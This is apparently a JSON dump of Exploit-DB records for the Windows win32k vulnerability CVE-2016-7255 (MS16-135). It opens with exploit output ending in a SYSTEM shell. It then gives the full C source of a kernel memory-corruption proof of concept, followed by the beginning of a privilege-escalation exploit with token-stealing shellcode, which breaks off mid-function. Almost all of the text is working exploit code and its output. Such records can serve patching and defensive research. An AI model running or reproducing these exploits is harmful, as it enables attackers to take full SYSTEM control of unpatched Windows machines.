................\r\n000000003D9ECBF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC20 | 63 78 82 00 00 00 00 00 00 00 00 00 00 00 00 00 | cx..............\r\n000000003D9ECC30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC50 | 63 b8 57 00 00 00 00 00 00 00 00 00 00 00 00 00 | c.W.............\r\n000000003D9ECC60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECCA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECCB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECCC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECCD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECCE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECCF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD90 | 63 08 a9 30 01 00 00 00 63 68 c2 2a 00 00 00 00 | c..0....ch.*....\r\n000000003D9ECDA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECDB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECDC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECDD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECDE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECDF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE60 | 63 78 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 | cx..............\r\n000000003D9ECE70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECEA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECEB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECEC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECED0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECEE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECEF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECF00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECF10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECF20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECF30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECF40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECF50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECF60 | 67 18 21 00 01 00 00 80 00 00 00 00 00 00 00 00 | g.!.............\r\n000000003D9ECF70 | 00 00 00 00 00 00 00 00 63 10 98 00 00 00 00 00 | ........c.......\r\n000000003D9ECF80 | 63 40 98 00 00 00 00 00 00 00 00 00 00 00 00 00 | c@..............\r\n000000003D9ECF90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECFA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECFB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECFC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECFD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECFE0 | 63 d8 34 02 00 00 00 00 63 38 8c 00 00 00 00 00 | c.4.....c8......\r\n000000003D9ECFF0 | 00 00 00 00 00 00 00 00 63 f0 99 00 00 00 00 00 | ........c.......\r\n\r\n+] Selected spurious PML4E: fffff67b3d9ecf00\r\n+] Spurious PT: fffff67b3d9e0000\r\n+] Content pml4e fffff67b3d9ecff8: 99f063\r\n+] Patching the Spurious Offset with 99f067\r\n+] Content pdpte fffff67b3d9ffff8: 9a0063\r\n+] Patching the Spurious Offset with 9a0067\r\n+] Content pdpte fffff67b3ffffff0: 821063\r\n+] Patching the Spurious Offset with 821067\r\n+] Content pte fffff67fffffe800: 1967\r\n+] Patching the Spurious Offset with 1967\r\nOriginal HalpIntteruptRequest pointer: fffff80150e1fc40\r\n+] Selected spurious PML4E: fffff67b3d9ecf08\r\n+] Spurious PT: fffff67b3d9e1000\r\n+] Content pml4e fffff67b3d9ecff8: 99f063\r\n+] Patching the Spurious Offset with 99f067\r\n+] Content pdpte fffff67b3d9ffff8: 9a0063\r\n+] Patching the Spurious Offset with 9a0067\r\n+] Content pdpte fffff67b3ffffff0: 821063\r\n+] Patching the Spurious Offset with 821067\r\n+] Content pte fffff67fffffe800: 1967\r\n*** Patching the original location to enable NX...\r\n+] Patching the Spurious Offset with 1967\r\nHAL address: fffff67b3d9e1000\r\n+] w00t: Shellcode stored at: ffffffffffd00d50\r\n+] Selected spurious PML4E: fffff67b3d9ecf10\r\n+] Spurious PT: fffff67b3d9e2000\r\n+] Content pml4e fffff67b3d9ecff8: 99f063\r\n+] Patching the Spurious Offset with 99f067\r\n+] Content pdpte fffff67b3d9ffff8: 9a0063\r\n+] Patching the Spurious Offset with 9a0067\r\n+] Content pdpte fffff67b3ffffff0: 821063\r\n+] Patching the Spurious Offset with 821067\r\n+] Content pte fffff67fffffe800: 1967\r\n+] Patching the Spurious Offset with 1967\r\nPatch HalpInterruptController->HalpApicRequestInterrupt: fffff67b3d9e26e8 with ffffffffffd00d50\r\nMicrosoft Windows [Version 10.0.14393]\r\n(c) 2016 Microsoft Corporation. All rights reserved.\r\n\r\nC:\\Users\\qa\\Desktop>\r\nC:\\Users\\qa\\Desktop>whoami\r\nnt authority\\system\r\n\r\nC:\\Users\\qa\\Desktop>\r\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/40823/"}, {"lastseen": "2016-11-10T01:30:30", "description": "Microsoft Windows Kernel - win32k Denial of Service (MS16-135). CVE-2016-7255. Dos exploit for Windows platform", "published": "2016-11-09T00:00:00", "type": "exploitdb", "title": "Microsoft Windows Kernel - win32k Denial of Service (MS16-135)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7255"], "modified": "2016-11-09T00:00:00", "id": "EDB-ID:40745", "href": "https://www.exploit-db.com/exploits/40745/", "sourceData": "/*\r\nSource: https://github.com/tinysec/public/tree/master/CVE-2016-7255\r\n\r\nFull Proof of Concept:\r\n\r\nhttps://github.com/tinysec/public/tree/master/CVE-2016-7255\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40745.zip\r\n\r\n********************************************************************\r\n Created:\t2016-11-09 14:23:09\r\n Filename: \tmain.c\r\n Author:\troot[at]TinySec.net\r\n Version\t0.0.0.1\r\n Purpose:\tpoc of cve-2016-0075\r\n*********************************************************************\r\n*/\r\n\r\n#include <windows.h>\r\n#include <wchar.h>\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n\r\n\r\n//////////////////////////////////////////////////////////////////////////\r\n#pragma comment(lib,\"ntdll.lib\")\r\n#pragma comment(lib,\"user32.lib\")\r\n\r\n#undef DbgPrint\r\nULONG __cdecl DbgPrintEx( IN ULONG ComponentId, IN ULONG Level, IN PCCH Format, IN ... );\r\nULONG __cdecl DbgPrint(__in char* Format, ...)\r\n{\r\n\tCHAR* pszDbgBuff = NULL;\r\n\tva_list VaList=NULL;\r\n\tULONG ulRet = 0;\r\n\t\r\n\tdo \r\n\t{\r\n\t\tpszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0 ,1024 * sizeof(CHAR));\r\n\t\tif (NULL == pszDbgBuff)\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\tRtlZeroMemory(pszDbgBuff,1024 * sizeof(CHAR));\r\n\t\t\r\n\t\tva_start(VaList,Format);\r\n\t\t\r\n\t\t_vsnprintf((CHAR*)pszDbgBuff,1024 - 1,Format,VaList);\r\n\t\t\r\n\t\tDbgPrintEx(77 , 0 , pszDbgBuff );\r\n\t\tOutputDebugStringA(pszDbgBuff);\r\n\t\t\r\n\t\tva_end(VaList);\r\n\t\t\r\n\t} while (FALSE);\r\n\t\r\n\tif (NULL != pszDbgBuff)\r\n\t{\r\n\t\tHeapFree( GetProcessHeap(), 0 , pszDbgBuff );\r\n\t\tpszDbgBuff = NULL;\r\n\t}\r\n\t\r\n\treturn ulRet;\r\n}\r\n\r\n\r\n int _sim_key_down(WORD wKey)\r\n {\r\n\t INPUT stInput = {0};\r\n\t \r\n\t do \r\n\t {\r\n\t\t stInput.type = INPUT_KEYBOARD;\r\n\t\t stInput.ki.wVk = wKey;\r\n\t\t stInput.ki.dwFlags = 0;\r\n\t\t \r\n\t\t SendInput(1 , &stInput , sizeof(stInput) );\r\n\r\n\t } while (FALSE);\r\n\t \r\n\t return 0;\r\n}\r\n\r\n int _sim_key_up(WORD wKey)\r\n {\r\n\t INPUT stInput = {0};\r\n\t \r\n\t do \r\n\t {\r\n\t\t stInput.type = INPUT_KEYBOARD;\r\n\t\t stInput.ki.wVk = wKey;\r\n\t\t stInput.ki.dwFlags = KEYEVENTF_KEYUP;\r\n\t\t \r\n\t\t SendInput(1 , &stInput , sizeof(stInput) );\r\n\t\t \r\n\t } while (FALSE);\r\n\t \r\n\t return 0;\r\n}\r\n\r\n int _sim_alt_shift_esc()\r\n {\r\n\t int i = 0;\r\n\t \r\n\t do \r\n\t {\r\n\t\t _sim_key_down( VK_MENU );\r\n\t\t _sim_key_down( VK_SHIFT );\t \r\n\t\t \r\n\t\t\r\n\t\t_sim_key_down( VK_ESCAPE);\r\n\t\t_sim_key_up( VK_ESCAPE);\r\n\r\n\t\t_sim_key_down( VK_ESCAPE);\r\n\t\t_sim_key_up( VK_ESCAPE);\r\n\t\t\t \r\n\t\t _sim_key_up( VK_MENU );\r\n\t\t _sim_key_up( VK_SHIFT );\t \t \r\n\t\t \r\n\t\t \r\n\t } while (FALSE);\r\n\t \r\n\t return 0;\r\n}\r\n\r\n \r\n\r\n int _sim_alt_shift_tab(int nCount)\r\n {\r\n\t int i = 0;\r\n\t HWND hWnd = NULL;\r\n\r\n\r\n\t int nFinalRet = -1;\r\n\r\n\t do \r\n\t {\r\n\t\t _sim_key_down( VK_MENU );\r\n\t\t _sim_key_down( VK_SHIFT );\t \r\n\r\n\r\n\t\t for ( i = 0; i < nCount ; i++)\r\n\t\t {\r\n\t\t\t _sim_key_down( VK_TAB);\r\n\t\t\t _sim_key_up( VK_TAB);\r\n\t\t\t \r\n\t\t\t Sleep(1000);\r\n\r\n\t\t }\r\n\t\r\n\t\t \r\n\t\t_sim_key_up( VK_MENU );\r\n\t\t _sim_key_up( VK_SHIFT );\t \r\n\t } while (FALSE);\r\n\t \r\n\t return nFinalRet;\r\n}\r\n\r\n\r\n\r\nint or_address_value_4(__in void* pAddress)\r\n{\r\n\tWNDCLASSEXW stWC = {0};\r\n\r\n\tHWND\thWndParent = NULL;\r\n\tHWND\thWndChild = NULL;\r\n\r\n\tWCHAR*\tpszClassName = L\"cve-2016-7255\";\r\n\tWCHAR*\tpszTitleName = L\"cve-2016-7255\";\r\n\r\n\tvoid*\tpId = NULL;\r\n\tMSG\t\tstMsg = {0};\r\n\r\n\tdo \r\n\t{\r\n\r\n\t\tstWC.cbSize = sizeof(stWC);\r\n\t\tstWC.lpfnWndProc = DefWindowProcW;\r\n\t\tstWC.lpszClassName = pszClassName;\r\n\t\t\r\n\t\tif ( 0 == RegisterClassExW(&stWC) )\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\thWndParent = CreateWindowExW(\r\n\t\t\t0,\r\n\t\t\tpszClassName,\r\n\t\t\tNULL,\r\n\t\t\tWS_OVERLAPPEDWINDOW|WS_VISIBLE,\r\n\t\t\t0,\r\n\t\t\t0,\r\n\t\t\t360,\r\n\t\t\t360,\r\n\t\t\tNULL,\r\n\t\t\tNULL,\r\n\t\t\tGetModuleHandleW(NULL),\r\n\t\t\tNULL\r\n\t\t);\r\n\r\n\t\tif (NULL == hWndParent)\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\thWndChild = CreateWindowExW(\r\n\t\t\t0,\r\n\t\t\tpszClassName,\r\n\t\t\tpszTitleName,\r\n\t\t\tWS_OVERLAPPEDWINDOW|WS_VISIBLE|WS_CHILD,\r\n\t\t\t0,\r\n\t\t\t0,\r\n\t\t\t160,\r\n\t\t\t160,\r\n\t\t\thWndParent,\r\n\t\t\tNULL,\r\n\t\t\tGetModuleHandleW(NULL),\r\n\t\t\tNULL\r\n\t\t);\r\n\t\t\r\n\t\tif (NULL == hWndChild)\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\t#ifdef _WIN64\r\n\t\t\tpId = ( (UCHAR*)pAddress - 0x28 ); \r\n\t\t#else\r\n\t\t\tpId = ( (UCHAR*)pAddress - 0x14); \r\n\t\t#endif // #ifdef _WIN64\r\n\t\t\r\n\t\tSetWindowLongPtr(hWndChild , GWLP_ID , (LONG_PTR)pId );\r\n\r\n\t\tDbgPrint(\"hWndChild = 0x%p\\n\" , hWndChild);\r\n\t\tDebugBreak();\r\n\r\n\t\tShowWindow(hWndParent , SW_SHOWNORMAL);\r\n\r\n\t\tSetParent(hWndChild , GetDesktopWindow() );\r\n\r\n\t\tSetForegroundWindow(hWndChild);\r\n\r\n\t\t_sim_alt_shift_tab(4);\r\n\t\t\r\n\t\tSwitchToThisWindow(hWndChild , TRUE);\r\n\t\t\r\n\t\t_sim_alt_shift_esc();\r\n\r\n\r\n\t\twhile( GetMessage(&stMsg , NULL , 0 , 0) )\r\n\t\t{\t\r\n\t\t\tTranslateMessage(&stMsg);\r\n\t\t\tDispatchMessage(&stMsg);\r\n\t\t}\r\n\t\r\n\r\n\t} while (FALSE);\r\n\r\n\tif ( NULL != hWndParent )\r\n\t{\r\n\t\tDestroyWindow(hWndParent);\r\n\t\thWndParent = NULL;\r\n\t}\r\n\r\n\tif ( NULL != hWndChild )\r\n\t{\r\n\t\tDestroyWindow(hWndChild);\r\n\t\thWndChild = NULL;\r\n\t}\r\n\r\n\tUnregisterClassW(pszClassName , GetModuleHandleW(NULL) );\r\n\r\n\treturn 0;\r\n}\r\n\r\nint __cdecl wmain(int nArgc, WCHAR** Argv)\r\n{\r\n\tdo \r\n\t{\r\n\t\tor_address_value_4( (void*)0xFFFFFFFF );\r\n\t} while (FALSE);\r\n\t\r\n\treturn 0;\r\n}\r\n\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/40745/"}, {"lastseen": "2017-01-11T17:58:55", "description": "Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2). CVE-2016-7255. Local exploit for Windows platform", "published": "2017-01-08T00:00:00", "type": "exploitdb", "title": "Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7255"], "modified": "2017-01-08T00:00:00", "id": "EDB-ID:41015", "href": "https://www.exploit-db.com/exploits/41015/", "sourceData": "/*\r\nSource: https://ricklarabee.blogspot.com/2017/01/virtual-memory-page-tables-and-one-bit.html\r\n\r\nBinary: https://github.com/rlarabee/exploits/raw/8b9eb646516d7f022a010f28018209f331c28975/cve-2016-7255/compiled/cve-2016-7255.exe\r\nMirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41015.exe\r\n*/\r\n\r\n// ricklarabee.blogspot.com\r\n\r\n//This program is free software; you can redistribute it and/or\r\n//modify it under the terms of the GNU General Public License\r\n//as published by the Free Software Foundation.\r\n\r\n//This program is distributed in the hope that it will be useful,\r\n//but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n//MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the\r\n//GNU General Public License for more details.\r\n\r\n//You should have received a copy of the GNU General Public License\r\n//along with this program; if not, write to the Free Software\r\n//Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\r\n\r\n// Credits: enrique.nissim@IOActive.com: https://github.com/IOActive/I-know-where-your-page-lives/tree/master/code/CVE-2016-7255\r\n// PoC from https://github.com/tinysec/public/tree/master/CVE-2016-7255\r\n\r\n#include <windows.h>\r\n#include <wchar.h>\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n\r\n#pragma comment(lib,\"ntdll.lib\")\r\n#pragma comment(lib,\"user32.lib\")\r\n#pragma comment(lib, \"advapi32\")\r\n\r\nUINT64 PML4_BASE;\r\nUINT PML4_SELF_REF_INDEX;\r\nUINT64 PML4_SELF_REF = 0xFFFFF6FB7DBEDF68;\r\n\r\n#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)\r\n#define STATUS_UNSUCCESSFUL ((NTSTATUS)0xC0000001L)\r\n#define GET_INDEX(va) ( ((va >> 39) & 0x1ff )) \r\n\r\n////////////////////////////////////////////////////////\r\n// Define Data Types\r\n////////////////////////////////////////////////////////\r\ntypedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {\r\n PVOID Unknown1;\r\n PVOID Unknown2;\r\n PVOID Base;\r\n ULONG Size;\r\n ULONG Flags;\r\n USHORT Index;\r\n USHORT NameLength;\r\n USHORT LoadCount;\r\n USHORT PathLength;\r\n CHAR ImageName[256];\r\n} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;\r\n\r\ntypedef struct _SYSTEM_MODULE_INFORMATION {\r\n ULONG Count;\r\n SYSTEM_MODULE_INFORMATION_ENTRY Module[1];\r\n} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;\r\n\r\ntypedef enum _SYSTEM_INFORMATION_CLASS { \r\n SystemModuleInformation = 11,\r\n SystemHandleInformation = 16\r\n} SYSTEM_INFORMATION_CLASS;\r\n\r\ntypedef NTSTATUS (WINAPI *NtQuerySystemInformation_t)(IN SYSTEM_INFORMATION_CLASS SystemInformationClass,\r\n OUT PVOID SystemInformation,\r\n IN ULONG SystemInformationLength,\r\n OUT PULONG ReturnLength);\r\n\r\ntypedef NTSTATUS (WINAPI *NtQueryIntervalProfile_t)(IN ULONG ProfileSource,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\tOUT PULONG Interval);\r\n\r\nNtQuerySystemInformation_t NtQuerySystemInformation;\r\nNtQueryIntervalProfile_t NtQueryIntervalProfile;\r\n \r\nchar shellcode[] = {\r\n\t//0xcc,\r\n\t0xfa, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// CLI\r\n\t0x9c, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSHFQ\r\n\t0x48, 0xb8, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, \t// MOV RAX, Original Pointer\r\n\t0x50, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSH RAX\r\n\t0x51, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSH RCX\r\n\t0x48, 0xb9, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, \t// MOV RCX, [OverwriteAddr+OverwriteOffset]\r\n\t0x48, 0x89, 0x01, \t\t\t\t\t\t\t\t\t\t\t\t// MOV QWORD PTR [RCX], RAX\r\n\t0xb9, 0x90, 0x90, 0x90, 0x90, \t\t\t\t\t\t\t\t\t// MOV ECX, PID\r\n\t0x53, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSH RBX\r\n\r\n\t0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, \t\t\t// MOV RAX,QWORD PTR gs:0x188\r\n\t0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00,\t\t\t\t\t\t// MOV RAX,QWORD PTR [RAX+0xb8] EPROCESS\r\n\t0x48, 0x8d, 0x80, 0x90, 0x90, 0x00, 0x00,\t\t\t\t\t\t// LEA RAX,[RAX+0xActiveProcessLinkOffset] \r\n\t//<tag>\r\n\t0x48, 0x8b, 0x00,\t\t\t\t\t\t\t\t\t\t\t\t// MOV RAX,QWORD PTR [RAX]\r\n\t0x48, 0x8b, 0x58, 0xf8,\t\t\t\t\t\t\t\t\t\t\t// MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID\r\n\t0x48, 0x83, 0xfb, 0x04,\t\t\t\t\t\t\t\t\t\t\t// CMP RBX,0x4\r\n\t0x75, 0xf3,\t\t\t\t\t\t\t\t\t\t\t\t\t\t// JNE <tag>\r\n\t0x48, 0x8b, 0x98, 0x90, 0x90, 0x90, 0x90,\t\t\t\t\t\t// MOV RBX, QWORD PTR [RAX+0x60] // GET TOKEN of SYSTEM\r\n\r\n\t0x53, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSH RBX\r\n\t//<tag2>\r\n\t0x48, 0x8b, 0x00,\t\t\t\t\t\t\t\t\t\t\t\t// MOV RAX,QWORD PTR [RAX]\r\n\t0x48, 0x8b, 0x58, 0xf8,\t\t\t\t\t\t\t\t\t\t\t// MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID\r\n\t0x39, 0xcb,\t\t\t\t\t\t\t\t\t\t\t\t\t\t// CMP EBX, ECX // our PID\r\n\t0x75, 0xf5,\t\t\t\t\t\t\t\t\t\t\t\t\t\t// JNE <tag2>\r\n\t0x5b, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// POP RBX\r\n\t0x48, 0x89, 0x98, 0x90, 0x90, 0x90, 0x90,\t\t\t\t\t\t// MOV QWORD PTR[RAX + 0x60], RBX\r\n\r\n\t0x5b, // POP RBX\r\n\t0x59, // POP RCX\r\n\t0x58, // POP RAX\r\n\t0x9d, // POPFQ\r\n\r\n\t0xfb, // STI\r\n\t0xff, 0xe0 // JMP RAX\r\n};\r\n\r\nULONG __cdecl DbgPrint(__in char* Format, ...)\r\n{\r\n\tCHAR* pszDbgBuff = NULL;\r\n\tva_list VaList = NULL;\r\n\tULONG ulRet = 0;\r\n\r\n\tdo\r\n\t{\r\n\t\tpszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0, 1024 * sizeof(CHAR));\r\n\t\tif (NULL == pszDbgBuff)\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\tRtlZeroMemory(pszDbgBuff, 1024 * sizeof(CHAR));\r\n\r\n\t\tva_start(VaList, Format);\r\n\r\n\t\t_vsnprintf((CHAR*)pszDbgBuff, 1024 - 1, Format, VaList);\r\n\r\n\r\n\t\tOutputDebugStringA(pszDbgBuff);\r\n\r\n\t\tva_end(VaList);\r\n\r\n\t} while (FALSE);\r\n\r\n\tif (NULL != pszDbgBuff)\r\n\t{\r\n\t\tHeapFree(GetProcessHeap(), 0, pszDbgBuff);\r\n\t\tpszDbgBuff = NULL;\r\n\t}\r\n\r\n\treturn ulRet;\r\n}\r\n\r\n\r\nint _sim_key_down(WORD wKey)\r\n{\r\n\tINPUT stInput = { 0 };\r\n\r\n\tdo\r\n\t{\r\n\t\tstInput.type = INPUT_KEYBOARD;\r\n\t\tstInput.ki.wVk = wKey;\r\n\t\tstInput.ki.dwFlags = 0;\r\n\r\n\t\tSendInput(1, &stInput, sizeof(stInput));\r\n\r\n\t} while (FALSE);\r\n\r\n\treturn 0;\r\n}\r\n\r\nint _sim_key_up(WORD wKey)\r\n{\r\n\tINPUT stInput = { 0 };\r\n\r\n\tdo\r\n\t{\r\n\t\tstInput.type = INPUT_KEYBOARD;\r\n\t\tstInput.ki.wVk = wKey;\r\n\t\tstInput.ki.dwFlags = KEYEVENTF_KEYUP;\r\n\r\n\t\tSendInput(1, &stInput, sizeof(stInput));\r\n\r\n\t} while (FALSE);\r\n\r\n\treturn 0;\r\n}\r\n\r\nint _sim_alt_shift_esc()\r\n{\r\n\tint i = 0;\r\n\r\n\tdo\r\n\t{\r\n\t\t_sim_key_down(VK_MENU);\r\n\t\t_sim_key_down(VK_SHIFT);\r\n\r\n\r\n\t\t_sim_key_down(VK_ESCAPE);\r\n\t\t_sim_key_up(VK_ESCAPE);\r\n\r\n\t\t_sim_key_down(VK_ESCAPE);\r\n\t\t_sim_key_up(VK_ESCAPE);\r\n\r\n\t\t_sim_key_up(VK_MENU);\r\n\t\t_sim_key_up(VK_SHIFT);\r\n\r\n\r\n\t} while (FALSE);\r\n\r\n\treturn 0;\r\n}\r\n\r\n\r\n\r\nint _sim_alt_shift_tab(int nCount)\r\n{\r\n\tint i = 0;\r\n\tHWND hWnd = NULL;\r\n\r\n\r\n\tint nFinalRet = -1;\r\n\r\n\tdo\r\n\t{\r\n\t\t_sim_key_down(VK_MENU);\r\n\t\t_sim_key_down(VK_SHIFT);\r\n\r\n\r\n\t\tfor (i = 0; i < nCount; i++)\r\n\t\t{\r\n\t\t\t_sim_key_down(VK_TAB);\r\n\t\t\t_sim_key_up(VK_TAB);\r\n\r\n\t\t\tSleep(1000);\r\n\r\n\t\t}\r\n\r\n\r\n\t\t_sim_key_up(VK_MENU);\r\n\t\t_sim_key_up(VK_SHIFT);\r\n\t} while (FALSE);\r\n\r\n\treturn nFinalRet;\r\n}\r\n\r\nint _sim_alt_esc(int count)\r\n{\r\n\tint i = 0;\r\n\r\n\tfor (i = 0; i<count; i++)\r\n\t{\r\n\t\t_sim_key_down(VK_MENU);\r\n\t\t//_sim_key_down(VK_SHIFT);\r\n\r\n\r\n\t\t_sim_key_down(VK_ESCAPE);\r\n\t\t_sim_key_up(VK_ESCAPE);\r\n\r\n\t\t_sim_key_down(VK_ESCAPE);\r\n\t\t_sim_key_up(VK_ESCAPE);\r\n\r\n\t\t_sim_key_up(VK_MENU);\r\n\t\t//_sim_key_up(VK_SHIFT);\r\n\r\n\t}\r\n\r\n\treturn 0;\r\n}\r\n\r\n\r\nint or_address_value_4(__in void* pAddress)\r\n{\r\n\tWNDCLASSEXW stWC = { 0 };\r\n\r\n\tHWND hWndParent = NULL;\r\n\tHWND hWndChild = NULL;\r\n\r\n\tWCHAR* pszClassName = L\"cve-2016-7255\";\r\n\tWCHAR* pszTitleName = L\"cve-2016-7255\";\r\n\r\n\tvoid* pId = NULL;\r\n\tMSG stMsg = { 0 };\r\n\r\n\tUINT64 value = 0;\r\n\r\n\tdo\r\n\t{\r\n\r\n\t\tstWC.cbSize = sizeof(stWC);\r\n\t\tstWC.lpfnWndProc = DefWindowProcW;\r\n\t\tstWC.lpszClassName = pszClassName;\r\n\r\n\t\tif (0 == 